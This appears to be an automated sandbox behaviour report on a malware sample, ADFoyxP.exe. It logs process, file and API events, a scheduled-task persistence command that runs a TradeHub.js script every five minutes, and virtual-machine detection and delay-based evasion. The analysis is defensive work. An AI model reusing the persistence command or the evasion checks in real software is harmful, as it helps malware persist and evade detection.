Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_008426DD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007CFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_007CFC7C
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\Desktop\ADFoyxP.exeWindow / User API: threadDelayed 1518Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comWindow / User API: threadDelayed 9691Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWindow / User API: threadDelayed 9941
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9884
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comAPI coverage: 4.2 %
Source: C:\Users\user\Desktop\ADFoyxP.exe TID: 2100Thread sleep time: -142692s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7988Thread sleep count: 9691 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7988Thread sleep time: -96910s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 4424Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 2692Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 9024Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 7248Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comThread sleep count: Count: 9691 delay: -10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0082A087
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0082A1E2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,23_2_0081E472
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,23_2_0082A570
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007EC622 FindFirstFileExW,23_2_007EC622
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008266DC FindFirstFileW,FindNextFileW,FindClose,23_2_008266DC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,23_2_008273D4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00827333 FindFirstFileW,FindClose,23_2_00827333
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_0081D921
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_0081DC54
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,23_2_007B5FC8
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090Jump to behavior
